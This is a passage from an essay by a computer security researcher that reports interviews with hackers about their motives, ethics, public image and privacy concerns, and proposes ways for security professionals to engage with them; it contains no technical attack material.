use the term ``hacker'' since the people I am writing about call
|
|
themselves hackers and all are interested in learning about computer
|
|
and communication systems. However, there are many people like
|
|
Stallman who call themselves hackers and do not engage in illegal
|
|
or deceptive practices; this paper is also not about those hackers.
|
|
|
|
In what follows I will report on what I have learned about hackers
|
|
from hackers. I will organize the discussion around the principal
|
|
domains of concerns I observed. I recommend Meyer's thesis (Meyer89)
|
|
for a more detailed treatment of the hackers' social culture and
|
|
networks, and Meyer and Thomas (MeyerThomas90) for an interesting
|
|
interpretation of the computer underground as a postmodernist rejection
|
|
of conventional culture that substitutes ``rational technological
|
|
control of the present for an anarchic and playful future.''
|
|
|
|
I do not pretend to know all the concerns that hackers have, nor
|
|
do I claim to have conducted a scientific study. Rather, I hope
|
|
that my own informal study motivates others to explore the area
|
|
further. It is essential that we as computer security professionals
|
|
take into account hackers' concerns in the design of our policies,
|
|
procedures, laws regulating computer and information access, and
|
|
educational programs. Although I speak about security-breaking hackers
|
|
as a group, their competencies, actions, and views are not all the
|
|
same. Thus, it is equally important that our policies and programs
|
|
take into account individual differences.
|
|
|
|
In focusing on what hackers say and do, I do not mean for a moment
|
|
to set aside the concerns of the owners and users of systems that
|
|
hackers break into, the concerns of law enforcement personnel, or
|
|
our own concerns as computer security professionals. But I do
|
|
recommend that we work closely with hackers as well as these other
|
|
groups to design new approaches and programs for addressing the
|
|
concerns of all. Like ham radio operators, hackers exist, and it
|
|
is in our best interest that we learn to communicate and work with
|
|
them rather than against them.
|
|
|
|
I will suggest some actions that we might consider taking, and I
|
|
invite others to reflect on these and suggest their own. Many of
|
|
these suggestions are from the hackers themselves; others came from
|
|
the recommendations of the ACM Panel on Hacking (Lee86) and from
|
|
colleagues.
|
|
|
|
I grouped the hackers' concerns into five categories: access to
|
|
computers and information for learning; thrill, excitement and
|
|
challenge; ethics and avoiding damage; public image and treatment;
|
|
and privacy and first amendment rights. These are discussed in
|
|
the next five subsections. I have made an effort to present my
|
|
findings as uncritical observations. The reader should not infer
|
|
that I either approve or disapprove of actions hackers take.
|
|
|
|
|
|
3. Access to Computers and Information for Learning
|
|
|
|
Although Levy's book ``Hackers'' (Levy84) is not about today's
|
|
security-breaking hackers, it articulates and interprets a ``hacker
|
|
ethic'' that is shared by many of these hackers. The ethic includes
|
|
two key principles that were formulated in the early days of the
|
|
AI Lab at MIT: ``Access to computers -- and anything which might
|
|
teach you something about the way the world works -- should be
|
|
unlimited and total,'' and ``All information should be free.'' In
|
|
the context in which these principles were formulated, the computers
|
|
of interest were research machines and the information was software
|
|
and systems information.
|
|
|
|
Since Stallman is a leading advocate of open systems and freedom
|
|
of information, especially software, I asked him what he means by
|
|
this. He said: ``I believe that all generally useful information
|
|
should be free. By `free' I am not referring to price, but rather
|
|
to the freedom to copy the information and to adapt it to one's own
|
|
uses.'' By ``generally useful'' he does not include confidential
|
|
information about individuals or credit card information, for example.
|
|
He further writes: ``When information is generally useful,
|
|
redistributing it makes humanity wealthier no matter who is
|
|
distributing and no matter who is receiving.'' Stallman has argued
|
|
strongly against user interface copyright, claiming that it does
|
|
not serve the users or promote the evolutionary process (Stallman90).
|
|
|
|
I asked hackers whether all systems should be accessible and all
|
|
information should be free. They said that it is OK if some systems
|
|
are closed and some information, mainly confidential information
|
|
about individuals, is not accessible. They make a distinction between
|
|
information about security technology, e.g., the DES, and confidential
|
|
information protected by that technology, arguing that it is the
|
|
former that should be accessible. They said that information hoarding
|
|
is inefficient and slows down evolution of technology. They also
|
|
said that more systems should be open so that idle resources are
|
|
not wasted. One hacker said that the high costs of communication
|
|
hurts the growth of the information economy.
|
|
|
|
These views of information sharing seem to go back at least as far
|
|
as the 17th and 18th centuries. Samuelson (Samuelson89) notes that
|
|
``The drafters of the Constitution, educated in the Enlightenment
|
|
tradition, shared that era's legacy of faith in the enabling powers
|
|
of knowledge for society as well as the individual.'' She writes
|
|
that our current copyright laws, which protect the expression of
|
|
information, but not the information itself, are based on the belief
|
|
that unfettered and widespread dissemination of information promotes
|
|
technological progress. (Similarly for patent laws which protect
|
|
devices and processes, not the information about them.) She cites
|
|
two recent court cases where courts reversed the historical trend
|
|
and treated information as ownable property. She raises questions
|
|
about whether in entering the Information Age where information is
|
|
the source of greatest wealth, we have outgrown the Enlightenment
|
|
tradition and are coming to treat information as property.
|
|
|
|
In a society where knowledge is said to be power, Drake expressed
|
|
particular concern about what he sees as a growing information gap
|
|
between the rich and poor. He would like to see information that
|
|
is not about individuals be made public, although it could still
|
|
be owned. He likes to think that companies would actually find it
|
|
to their advantage to share information. He noted how IBM's disclosure
|
|
of the PC allowed developers to make more products for the computers,
|
|
and how Adobe's disclosure of their fonts helped them compete against
|
|
the Apple-Microsoft deal. He recognizes that in our current political
|
|
framework, it is difficult to make all information public, because
|
|
complicated structures have been built on top of an assumption that
|
|
certain information will be kept secret. He cites our defense policy,
|
|
which is founded on secrecy for military information, as an example.
|
|
|
|
Hackers say they want access to information and computing and network
|
|
resources in order to learn. Both Levy (Levy84) and Landreth
|
|
(Landreth89) note that hackers have an intense, compelling interest
|
|
in computers and learning, and many go into computers as a profession.
|
|
Some hackers break into systems in order to learn more about how
|
|
the systems work. Landreth says these hackers want to remain
|
|
undiscovered so that they can stay on the system as long as possible.
|
|
Some of them devote most of their time to learning how to break the
|
|
locks and other security mechanisms on systems; their background
|
|
in systems and programming varies considerably. One hacker wrote
|
|
``A hacker sees a security hole and takes advantage of it because
|
|
it is there, not to destroy information or steal. I think our
|
|
activities would be analogous to someone discovering methods of
|
|
acquiring information in a library and becoming excited and perhaps
|
|
engrossed.''
|
|
|
|
We should not underestimate the effectiveness of the networks in
|
|
which hackers learn their craft. They do research, learn about
|
|
systems, work in groups, write, and teach others. One hacker said
|
|
that he belongs to a study group with the mission of churning out
|
|
files of information and learning as much as possible. Within the
|
|
group, people specialize, collaborate on research projects, share
|
|
information and news, write articles, and teach others about their
|
|
areas of specialization. Hackers have set up a private system of
|
|
education that engages them, teaches them to think, and allows them
|
|
to apply their knowledge in purposeful, if not always legal,
|
|
activity. Ironically, many of our nation's classrooms have been
|
|
criticized for providing a poor learning environment that seems to
|
|
emphasize memorization rather than thinking and reasoning. One hacker
|
|
reported that through volunteer work with a local high school, he
|
|
was trying to get students turned on to learning.
|
|
|
|
Many hackers say that the legitimate computer access they have through
|
|
their home and school computers do not meet their needs. One student
|
|
told me that his high school did not offer anything beyond elementary
|
|
courses in BASIC and PASCAL, and that he was bored by these. Hans
|
|
Huebner, a hacker in Germany who goes by the name Pengo, wrote in
|
|
a note to the RISKS Forum (Huebner89) : ``I was just interested in
|
|
computers, not in the data which has been kept on their disks. As
|
|
I was going to school at that time, I didn't even have the money
|
|
to buy my own computer. Since CP/M (which was the most sophisticated
|
|
OS I could use on machines which I had legal access to) didn't turn
|
|
me on anymore, I enjoyed the lax security of the systems I had access
|
|
to by using X.25 networks. You might point out that I should have
|
|
been patient and waited until I could go to the university and
|
|
use their machines. Some of you might understand that waiting was
|
|
just not the thing I was keen on in those days.''
|
|
|
|
Brian Harvey, in his position paper (Harvey86) for the ACM Panel on
|
|
Hacking, claims that the computer medium available to students, e.g.,
|
|
BASIC and floppy disks, is inadequate for challenging intellectual
|
|
work. His recommendation is that students be given access to real
|
|
computing power, and that they be taught how to use that power
|
|
responsibly. He describes a program he created at a public high school
|
|
in Massachusetts during the period 1979-1982. They installed a
|
|
PDP-11/70 and let students and teachers carry out the administration
|
|
of the system. Harvey assessed that putting the burden of dealing
|
|
with the problems of malicious users on the students themselves was
|
|
a powerful educational force. He also noted that the students who
|
|
had the skill and interest to be password hackers were discouraged
|
|
from this activity because they also wanted to keep the trust of
|
|
their colleagues in order that they could acquire ``superuser'' status
|
|
on the system.
|
|
|
|
Harvey also makes an interesting analogy between teaching computing
|
|
and teaching karate. In karate instruction, students are introduced
|
|
to the real, adult community. They are given access to a powerful,
|
|
deadly weapon, and at the same time are taught discipline and
|
|
responsibility. Harvey speculates that the reason that students
|
|
do not misuse their power is that they know they are being trusted
|
|
with something important, and they want to live up to that trust.
|
|
Harvey applied this principle when he set up the school system.
|
|
|
|
The ACM panel endorsed Harvey's recommendation, proposing a
|
|
three-tiered computing environment with local, district-wide, and
|
|
nation-wide networks. They recommended that computer professionals
|
|
participate in this effort as mentors and role models. They also
|
|
recommended that government and industry be encouraged to establish
|
|
regional computing centers using donated or re-cycled equipment;
|
|
that students be apprenticed to local companies either part-time
|
|
on a continuing basis or on a periodic basis; and, following a
|
|
suggestion from Felsenstein (Felsenstein86) for a ``Hacker's League,''
|
|
that a league analogous to the Amateur Radio Relay League be
|
|
established to make contributed resources available for educational
|
|
purposes.
|
|
|
|
Drake said he liked these recommendations. He said that if hackers
|
|
were given access to powerful systems through a public account system,
|
|
they would supervise themselves. He also suggested that Computer
|
|
Resource Centers be established in low-income areas in order to help
|
|
the poor get access to information. Perhaps hackers could help run
|
|
the centers and teach the members of the community how to use the
|
|
facilities. One of my colleagues suggested cynically that the hackers
|
|
would only use this to teach the poor how to hack rich people's
|
|
systems. A hacker responded by saying this was ridiculous; hackers
|
|
would not teach people how to break into systems, but rather how
|
|
to use computers effectively and not be afraid of them.
|
|
In addition, the hackers I spoke with who had given up illegal
|
|
activities said they stopped doing so when they got engaged in other
|
|
work.
|
|
|
|
Geoff Goodfellow and Richard Stallman have reported that they have
|
|
given hackers accounts on systems that they manage, and that the
|
|
hackers have not misused the trust granted to them. Perhaps
|
|
universities could consider providing accounts to pre-college students
|
|
on the basis of recommendations from their teachers or parents.
|
|
The students might be challenged to work on the same homework problems
|
|
assigned in courses or to explore their own interests. Students
|
|
who strongly dislike the inflexibility of classroom learning might
|
|
excel in an environment that allows them to learn on their own, in
|
|
much the way that hackers have done.
|
|
|
|
4. Thrill, Excitement, and Challenge
|
|
|
|
|
|
One hacker wrote that ``Hackers understand something basic about
|
|
computers, and that is that they can be enjoyed. I know none who
|
|
hack for money, or hack to frighten the company, or hack for anything
|
|
but fun.''
|
|
|
|
In the words of another hacker, ``Hacking was the ultimate cerebral
|
|
buzz for me. I would come home from another dull day at school,
|
|
turn my computer on, and become a member of the hacker elite. It
|
|
was a whole different world where there were no condescending adults
|
|
and you were judged only by your talent. I would first check in
|
|
to the private Bulletin Boards where other people who were like me
|
|
would hang out, see what the news was in the community, and trade
|
|
some info with people across the country. Then I would start actually
|
|
hacking. My brain would be going a million miles an hour and I'd
|
|
basically completely forget about my body as I would jump from one
|
|
computer to another trying to find a path into my target. It was
|
|
the rush of working on a puzzle coupled with the high of discovery
|
|
many magnitudes intensified. To go along with the adrenaline rush
|
|
was the illicit thrill of doing something illegal. Every step I made
|
|
could be the one that would bring the authorities crashing down on
|
|
me. I was on the edge of technology and exploring past it, spelunking
|
|
into electronic caves where I wasn't supposed to be.''
|
|
|
|
The other hackers I spoke with made similar statements about the
|
|
fun and challenge of hacking. In SPIN magazine (Dibbel90), reporter
|
|
Julian Dibbell speculated that much of the thrill comes from the
|
|
dangers associated with the activity, writing that ``the technology
|
|
just lends itself to cloak-and-dagger drama,'' and that ``hackers
|
|
were already living in a world in which covert action was nothing
|
|
more than a game children played.''
|
|
|
|
Eric Corley (Corley89) characterizes hacking as an evolved form of
|
|
mountain climbing. In describing an effort to construct a list of
|
|
active mailboxes on a Voice Messaging System, he writes ``I suppose
|
|
the main reason I'm wasting my time pushing all these buttons is
|
|
simply so that I can make a list of something that I'm not supposed
|
|
to have and be the first person to accomplish this.'' He said that
|
|
he was not interested in obtaining an account of his own on the system.
|
|
Gordon Meyer says he found this to be a recurring theme: ``We aren't
|
|
supposed to be able to do this, but we can'' -- so they do.
|
|
|
|
One hacker said he was now working on anti-viral programming. He
|
|
said it was almost as much fun as breaking into systems, and that
|
|
it was an intellectual battle against the virus author.
|
|
|
|
|
|
5. Ethics and Avoiding Damage
|
|
|
|
|
|
All of the hackers I spoke with said that malicious hacking was morally
|
|
wrong. They said that most hackers are not intentionally malicious,
|
|
and that they themselves are concerned about causing accidental
|
|
damage. When I asked Drake about the responsibility of a person
|
|
with a PC and modem, his reply included not erasing or modifying
|
|
anyone else's data, and not causing a legitimate user on a system
|
|
any problems. Hackers say they are outraged when other hackers cause
|
|
damage or use resources that would be missed, even if the results
|
|
are unintentional and due to incompetence. One hacker wrote ``I
|
|
have ALWAYS strived to do NO damage, and to inconvenience as few people
|
|
as possible. I NEVER, EVER, EVER DELETE A FILE. One of the first
|
|
commands I do on a new system is disable the delete file command.''
|
|
Some hackers say that it is unethical to give passwords and similar
|
|
security-related information to persons who might do damage. In
|
|
the recent incident where a hacker broke into Bell South and downloaded
|
|
a text file on the emergency 911 service, hackers say that there
|
|
was no intention to use this knowledge to break into or sabotage
|
|
the 911 system. According to Emmanuel Goldstein (Goldstein90), the
|
|
file did not even contain information about how to break into the
|
|
911 system.
|
|
|
|
The hackers also said that some break-ins were unethical, e.g.,
|
|
breaking into hospital systems, and that it is wrong to read
|
|
confidential information about individuals or steal classified
|
|
information. All said it was wrong to commit fraud for personal
|
|
profit.
|
|
|
|
Although we as computer security professionals often disagree with
|
|
hackers about what constitutes damage, the ethical standards listed
|
|
here sound much like our own. Where the hackers' ethics differ from
|
|
the standards adopted by most in the computer security community
|
|
is that hackers say it is not unethical to break into many systems,
|
|
use idle computer and communications resources, and download system
|
|
files in order to learn. Goldstein says that hacking is not wrong:
|
|
it is not the same as stealing, and uncovers design flaws and security
|
|
deficiencies (Goldstein89).
|
|
|
|
Brian Reid, a colleague at Digital who has spoken with many hackers,
|
|
speculates that a hacker's ethics may come from not being raised
|
|
properly as a civilized member of society, and not appreciating the
|
|
rules of living in society. One hacker responded to this with ``What
|
|
does `being brought up properly' mean? Some would say that it is
|
|
`good' to keep to yourself, mind your own business. Others might
|
|
argue that it is healthy to explore, take risks, be curious and
|
|
discover.'' Brian Harvey (Harvey86) notes that many hackers are
|
|
adolescents, and that adolescents are at a less advanced stage of
|
|
moral development than adults, where they might not see how the effects
|
|
of their actions hurt others. Larry Martin (Martin89) claims that
|
|
parents, teachers, the press, and others in society are not aware
|
|
of their responsibility to contribute to instilling ethical values
|
|
associated with computer use. This could be the consequence of the
|
|
youth of the computing field; many people are still computer illiterate
|
|
and cultural norms may be lagging behind advances in technology and
|
|
the growing dependency on that technology by businesses and society.
|
|
Hollinger and Lanza-Kaduce (HollingerLanza-Kaduce88) speculate that
|
|
the cultural normative messages about the use and abuse of computer
|
|
technology have been driven by the adoption of criminal laws in the
|
|
last decade. They also speculate that hacking may be encouraged
|
|
during the process of becoming computer literate. Some of my
|
|
colleagues say that hackers are irresponsible. One hacker responded
|
|
``I think it's a strong indication of the amount of responsibility
|
|
shown that so FEW actually DAMAGING incidents are known.''
|
|
|
|
But we must not overlook that the differences in ethics also reflect
|
|
a difference in philosophy about information and information handling
|
|
resources; whereas hackers advocate sharing, we seem to be advocating
|
|
ownership as property. The differences also represent an opportunity
|
|
to examine our own ethical behavior and our practices for information
|
|
sharing and protection. For example, one hacker wrote ``I will accept
|
|
that it is morally wrong to copy some proprietary software, however,
|
|
I think that it is morally wrong to charge $6000 for a program that
|
|
is only around 25K long.'' Hence, I shall go into a few of the ethical
|
|
points raised by hackers more closely. It is not a simple case of
|
|
good or mature (us) against bad or immature (hackers), or of teaching
|
|
hackers a list of rules.
|
|
|
|
Many computer professionals such as Martin (Martin89) argue the moral
|
|
questions by analogy. The analogies are then used to justify their
|
|
judgment of a hacker's actions as unethical. Breaking into a system
|
|
is compared with breaking into a house, and downloading information
|
|
and using computer and telecommunications services is compared with
|
|
stealing tangible goods. But, say hackers, the situations are not
|
|
the same. When someone breaks into a house, the objective is to
|
|
steal goods, which are often irreplaceable, and property is often
|
|
damaged in the process. By contrast, when a hacker breaks into a
|
|
system, the objective is to learn and avoid causing damage. Downloaded
|
|
information is copied, not stolen, and still exists on the original
|
|
system. Moreover, as noted earlier, information has not been
|
|
traditionally regarded as property. Dibbel (Dibbel90) says that
|
|
when the software industries and phone companies claim losses of
|
|
billions of dollars to piracy, they are not talking about goods that
|
|
disappear from the shelves and could have been sold.
|
|
|
|
We often say that breaking into a system implies a lack of caring
|
|
for the system's owner and authorized users. But, one hacker says
|
|
that the ease of breaking into a system reveals a lack of caring
|
|
on the part of the system manager to protect user and company assets,
|
|
or failure on the part of vendors to warn managers about the
|
|
vulnerabilities of their systems. He estimated his success rate
|
|
of getting in at 10-15%, and that is without spending more than an
|
|
hour on any one target system. Another hacker says that he sees
|
|
messages from vendors notifying the managers, but that the managers
|
|
fail to take action.
|
|
|
|
Richard Pethia of CERT (Computer Emergency Response Team) reports
|
|
that they seldom see cases of malicious damage caused by hackers,
|
|
but that the break-ins are nevertheless disruptive because system
|
|
users and administrators want to be sure that nothing was damaged.
|
|
(CERT suggests that sites reload system software from secure backups
|
|
and change all user passwords in order to protect against possible
|
|
back doors and Trojan Horses that might have been planted by the
|
|
hacker. Pethia also noted that prosecutors are generally called
|
|
for government sites, and are being called for non-government sites
|
|
with increasing frequency.) Pethia says that break-ins also generate
|
|
a loss of trust in the computing environment, and may lead to adoption
|
|
of new policies that are formulated in a panic or management edicts
|
|
that severely restrict connectivity to outside systems. Brian Harvey
|
|
says that hackers cause damage by increasing the amount of paranoia,
|
|
which in turn leads to tighter security controls that diminish the
|
|
quality of life for the users. Hackers respond to these points by
|
|
saying they are the scapegoats for systems that are not adequately
|
|
protected. They say that the paranoia is generated by ill-founded
|
|
fears and media distortions (I will return to this point later),
|
|
and that security need not be oppressive to keep hackers out; it
|
|
is mainly making sure that passwords and system defaults are
|
|
well chosen.
|
|
|
|
Pethia says that some intruders seem to be disruptive to prove a
|
|
point, such as that the systems are vulnerable, the security personnel
|
|
are incompetent, or ``it's not nice to say bad things about hackers.''
|
|
In the N.Y. Times, John Markoff (Markoff90) wrote that the hacker
|
|
who claimed to have broken into Cliff Stoll's system said he was
|
|
upset by Stoll's portrayal of hackers in ``The Cuckoo's Egg''
|
|
(Stoll90). Markoff reported that the caller said: ``He (Stoll)
|
|
was going on about how he hates all hackers, and he gave pretty much
|
|
of a one-sided view of who hackers are.''
|
|
|
|
``The Cuckoo's Egg'' captures many of the popular stereotypes of
|
|
hackers. Criminologist Jim Thomas criticizes it for presenting a
|
|
simplified view of the world, one where everything springs from the
|
|
forces of light (us) or of darkness (hackers) (Thomas90). He claims
|
|
that Stoll fails to see the similarities between his own activities
|
|
(e.g., monitoring communications, ``borrowing'' monitors without
|
|
authorization, shutting off network access without warning, and lying
|
|
to get information he wants) and those of hackers. He points out
|
|
Stoll's use of pejorative words such as ``varmint'' to describe
|
|
hackers, and Stoll's quote of a colleague: ``They're technically
|
|
skilled but ethically bankrupt programmers without any respect for
|
|
others' work -- or privacy. They're not destroying one or two
|
|
programs. They're trying to wreck the cooperation that builds our
|
|
networks,'' (Stoll90, p. 159). Thomas writes ``at an intellectual
|
|
level, it (Stoll's book) provides a persuasive, but simplistic, moral
|
|
imagery of the nature of right and wrong, and provides what -- to
|
|
a lay reader -- would seem a compelling justification for more statutes
|
|
and severe penalties against the computer underground. This is
|
|
troublesome for two reasons. First, it leads to a mentality of social
|
|
control by law enforcement during a social phase when some would
|
|
argue we are already over-controlled. Second, it invokes a punishment
|
|
model that assumes we can stamp out behaviors to which we object
|
|
if only we apprehend and convict a sufficient number of violators.
|
|
... There is little evidence that punishment will in the long run
|
|
reduce any given offense, and the research of Gordon Meyer and I
|
|
suggests that criminalization may, in fact, contribute to the growth
|
|
of the computer underground.''
|
|
|
|
|
|
6. Public Image and Treatment
|
|
|
|
|
|
Hackers express concern about their negative public image and
|
|
identity. As noted earlier, hackers are often portrayed as being
|
|
irresponsible and immoral. One hacker said that ``government
|
|
propaganda is spreading an image of our being at best, sub-human,
|
|
depraved, criminally inclined, morally corrupt, low life. We need
|
|
to prove that the activities that we are accused of (crashing systems,
|
|
interfering with life support equipment, robbing banks, and jamming
|
|
911 lines) are as morally abhorrent to us as they are to the general
|
|
public.''
|
|
|
|
The public identity of an individual or group is generated in part
|
|
by the actions of the group interacting with the standards of the
|
|
community observing those actions. What then accounts for the
|
|
difference between the hacker's public image and what they say about
|
|
themselves? One explanation may be the different standards. Outside
|
|
the hacking community, the simple act of breaking into systems is
|
|
regarded as unethical by many. The use of pejorative words like
|
|
``vandal'' and ``varmint'' reflect this discrepency in ethics. Even
|
|
the word ``criminal'' carries with it connotations of someone evil;
|
|
hackers say they are not criminal in this sense. Katie Hafner notes
|
|
that Robert Morris Jr., who was convicted of launching the Internet
|
|
worm, was likened to a terrorist even though the worm did not destroy
|
|
data (Hafner90)
|
|
|
|
Distortions of events and references to potential threats also create
|
|
an image of persons who are dangerous. Regarding the 911 incident
|
|
where a hacker downloaded a file from Bell South, Goldstein reported
|
|
``Quickly, headlines screamed that hackers had broken into the 911
|
|
system and were interfering with emergency telephone calls to the
|
|
police. One newspaper report said there were no indications that
|
|
anyone had died or been injured as a result of the intrusions. What
|
|
a relief. Too bad it wasn't true,'' (Goldstein90). In fact, the
|
|
hackers involved with the 911 text file had not broken into the 911
|
|
system. The dollar losses attributed to hacking incidents also are
|
|
often highly inflated.
|
|
|
|
Thomas and Meyer (ThomasMeyer90) say that the rhetoric depicting
|
|
hackers as a dangerous evil contributes to a ``witch hunt'' mentality,
|
|
wherein a group is first labeled as dangerous, and then enforcement
|
|
agents are mobilized to exorcise the alleged social evil. They see
|
|
the current sweeps against hackers as part of a reaction to a broader
|
|
fear of change, rather than to the actual crimes committed.
|
|
|
|
Hackers say they are particularly concerned that computer security
|
|
professionals and system managers do not appear to understand hackers
|
|
or be interested in their concerns. Hackers say that system managers
|
|
treat them like enemies and criminals, rather than as potential helpers
|
|
in their task of making their systems secure. This may reflect
|
|
managers' fears about hackers, as well as their responsibilities
|
|
to protect the information on their systems. Stallman says that
|
|
the strangers he encounters using his account are more likely to
|
|
have a chip on their shoulder than in the past; he attributes this
|
|
to a harsh enforcer mentality adopted by the establishment. He says
|
|
that network system managers start out with too little trust and
|
|
a hostile attitude toward strangers that few of the strangers deserve.
|
|
One hacker said that system managers show a lack of openness to those
|
|
who want to learn.
|
|
|
|
Stallman also says that the laws make the hacker scared to communicate
|
|
with anyone even slightly ``official,'' because that person might
|
|
try to track the hacker down and have him or her arrested. Drake
|
|
raised the issue of whether the laws could differentiate between
|
|
malicious and nonmalicious hacking, in support of a ``kinder, gentler''
|
|
relationship between hackers and computer security people. In fact,
|
|
many states such as California initially passed computer crime laws
|
|
that excluded malicious hacking; it was only later that these laws
|
|
were amended to include nonmalicious actions (HollingerLanza-Kaduce88).
|
|
Hollinger and Lanza-Kaduce speculate that these amendments and other
|
|
new laws were catalyzed mainly by media events, especially the reports
|
|
on the ``414 hackers'' and the movie ``War Games,'' which created
|
|
a perception of hacking as extremely dangerous, even if that perception
|
|
was not based on facts.
|
|
|
|
Hackers say they want to help system managers make their systems
|
|
more secure. They would like managers to recognize and use their
|
|
knowledge about system vulnerabilities. Landreth (Landreth89)
|
|
suggests ways in which system managers can approach hackers in order
|
|
to turn them into colleagues, and Goodfellow also suggests befriending
|
|
hackers (Goodfellow83). John Draper (Cap'n Crunch) says it would
|
|
help if system managers and the operators of phone companies and
|
|
switches could cooperate in tracing a hacker without bringing in
|
|
law enforcement authorities.
|
|
|
|
Drake suggests giving hackers free access in exchange for helping
|
|
with security, a suggestion that I also heard from several hackers.
|
|
Drake says that the current attitude of treating hackers as enemies
|
|
is not very conducive to a solution, and by belittling them, we only
|
|
cause ourselves problems.
|
|
|
|
I asked some of the hackers whether they'd be interested in breaking
|
|
into systems if the rules of the ``game'' were changed so that instead
|
|
of being threatened by prosecution, they were invited to leave a
|
|
``calling card'' giving their name, phone number, and method of
|
|
breaking in. In exchange, they would get recognition and points
|
|
for each vulnerability they discovered. Most were interested in
|
|
playing; one hacker said he would prefer monetary reward since he
|
|
was supporting himself. Any system manager interested in trying
|
|
this out could post a welcome message inviting hackers to leave their
|
|
cards. This approach could have the advantage of not only letting
|
|
the hackers contribute to the security of the system, but of allowing
|
|
the managers to quickly recognize the potentially malicious hackers,
|
|
since they are unlikely to leave their cards. Perhaps if hackers
|
|
are given the opportunity to make contributions outside the
|
|
underground, this will dampen their desire to pursue illegal activities.
|
|
|
|
Several hackers said that they would like to be able to pursue their
|
|
activities legally and for income. They like breaking into systems,
|
|
doing research on computer security, and figuring out how to protect
|
|
against vulnerabilities. They say they would like to be in a position
|
|
where they have permission to hack systems. Goodfellow suggests
|
|
hiring hackers to work on tiger teams that are commissioned to locate
|
|
vulnerabilities in systems through penetration testing. Baird
|
|
Info-Systems Safeguards, Inc., a security consulting firm, reports
|
|
that they have employed hackers on several assignments (Baird87).
|
|
They say the hackers did not violate their trust or the trust of
|
|
their clients, and performed in an outstanding manner. Baird believes
|
|
that system vulnerabilities can be better identified by employing
|
|
people who have exploited systems.
|
|
|
|
One hacker suggested setting up a clearinghouse that would match
|
|
hackers with companies that could use their expertise, while
|
|
maintaining anonymity of the hackers and ensuring confidentiality
|
|
of all records. Another hacker, in describing an incident where
|
|
he discovered a privileged account without a password, said ``What
|
|
I (and others) wish for is a way that hackers can give information
|
|
like this to a responsible source, AND HAVE HACKERS GIVEN CREDIT
|
|
FOR HELPING! As it is, if someone told them that `I'm a hacker, and
|
|
I REALLY think you should know...' they would freak out, and run
|
|
screaming to the SS (Secret Service) or the FBI. Eventually, the
|
|
person who found it would be caught, and hauled away on some crazy
|
|
charge. If they could only just ACCEPT that the hacker was trying
|
|
to help!'' The clearinghouse could also provide this type of service.
|
|
|
|
Hackers are also interested in security policy issues. Drake expressed
|
|
concern over how we handle information about computer security
|
|
vulnerabilities. He argues that it is better to make this information
|
|
public than cover it up and pretend that it does not exist, and cites
|
|
the CERT to illustrate how this approach can be workable. Other
|
|
hackers, however, argue for restricting initial dissemination of
|
|
flaws to customers and users. Drake also expressed concern about
|
|
the role of the government, particularly the military, in
|
|
cryptography. He argues that NSA's opinion on a cryptographic standard
|
|
should be taken with a large grain of salt because of their code
|
|
breaking role.
|
|
|
|
Some security specialists are opposed to hiring hackers for security
|
|
work, and Eugene Spafford has urged people not to do business with
|
|
any company that hires a convicted hacker to work in the security
|
|
area (ACM90). He says that ``This is like having a known arsonist
|
|
install a fire alarm.'' But, the laws are such that a person can
|
|
be convicted for having done nothing other than break into a system;
|
|
no serious damage (i.e., no ``computer arson'') is necessary. Many
|
|
of our colleagues, including Geoff Goodfellow (Goodfellow83) and
|
|
Brian Reid (Frenkel87), admit to having broken into systems in the
|
|
past. Reid is quoted as saying that because of the knowledge he gained
|
|
breaking into systems as a kid, he was frequently called in to help
|
|
catch people who break in. Spafford says that times have changed,
|
|
and that this method of entering the field is no longer socially
|
|
acceptable, and fails to provide adequate training in computer science
|
|
and computer engineering (Spafford89). However, from what I have
|
|
observed, many hackers do have considerable knowledge about
|
|
telecommunications, data security, operating systems, programming
|
|
languages, networks, and cryptography. But, I am not challenging
|
|
a policy to hire competent people of sound character. Rather, I
|
|
am challenging a strict policy that uses economic pressure to close
|
|
a field of activity to all persons convicted of breaking into
|
|
systems. It is enough that a company is responsible for the behavior
|
|
of its employees. Each hacker can be considered for employment based
|
|
on his or her own competency and character.
|
|
|
|
Some people have called for stricter penalties for hackers, including
|
|
prison terms, in order to send a strong deterrent message to hackers.
|
|
John Draper, who was incarcerated for his activities in the 1970's,
|
|
argues that in practice this will only make the problem worse. He
|
|
told me that he was forced under threat to teach other inmates his
|
|
knowledge of communications systems. He believes that prison sentences
|
|
will serve only to spread hacker's knowledge to career criminals.
|
|
He said he was never approached by criminals outside the prison,
|
|
but that inside the prison they had control over him.
|
|
|
|
One hacker said that by clamping down on the hobbyist underground,
|
|
we will only be left with the criminal underground. He said that
|
|
without hackers to uncover system vulnerabilities, the holes will
|
|
be left undiscovered, to be utilized by those likely to cause real
|
|
damage.
|
|
|
|
Goldstein argues that the existing penalties are already way out
|
|
of proportion to the acts committed, and that the reason is because
|
|
of computers (Goldstein89). He says that if Kevin Mitnick had
|
|
committed crimes similar to those he committed but without a computer,
|
|
he would have been classified as a mischief maker and maybe fined
|
|
$100 for trespassing; instead, he was put in jail without bail
|
|
(Goldstein89). Craig Neidorf, a publisher and editor of the electronic
|
|
newsletter ``Phrack,'' faces up to 31 years and a fine of $122,000
|
|
for receiving, editing, and transmitting the downloaded text file
|
|
on the 911 system (Goldstein90). (Since the time I wrote this, a new
|
|
indictment was issued with penalties of up to 65 years in prison.
|
|
Neidorf went on trial beginning July 23. The trial ended July 27
|
|
when the government dropped all charges. DED)
|
|
|
|
7. Privacy and the First and Fourth Amendments
|
|
|
|
The hackers I spoke with advocated privacy protection for sensitive
|
|
information about individuals. They said they are not interested
|
|
in invading people's privacy, and that they limited their hacking
|
|
activities to acquiring information about computer systems or how
|
|
to break into them. There are, of course, hackers who break into
|
|
systems such as the TRW credit database. Emanuel Goldstein argues
|
|
that such invasions of privacy took place before the hacker arrived
|
|
(Harpers90). Referring to credit reports, government files, motor
|
|
vehicle records, and the ``megabytes of data piling up about each
|
|
of us,'' he says that thousands of people legally can see and use
|
|
this data, much of it erroneous. He claims that the public has been
|
|
misinformed about the databases, and that hackers have become
|
|
scapegoats for the holes in the systems. One hacker questioned the
|
|
practice of storing sensitive personal information on open systems
|
|
with dial-up access, the accrual of the information, the methods
|
|
used to acquire it, and the purposes to which it is put. Another
|
|
hacker questioned the inclusion of religion and race in credit records.
|
|
Drake told me that he was concerned about the increasing amount of
|
|
information about individuals that is stored in large data banks,
|
|
and the inability of the individual to have much control over the
|
|
use of that information. He suggests that the individual might be
|
|
co-owner of information collected about him or her, with control
|
|
over the use of that information. He also says that an individual
|
|
should be free to withhold personal information, of course paying
|
|
the consequences of doing so (e.g., not getting a drivers license
|
|
or credit card). In fact, all Federal Government forms are required
|
|
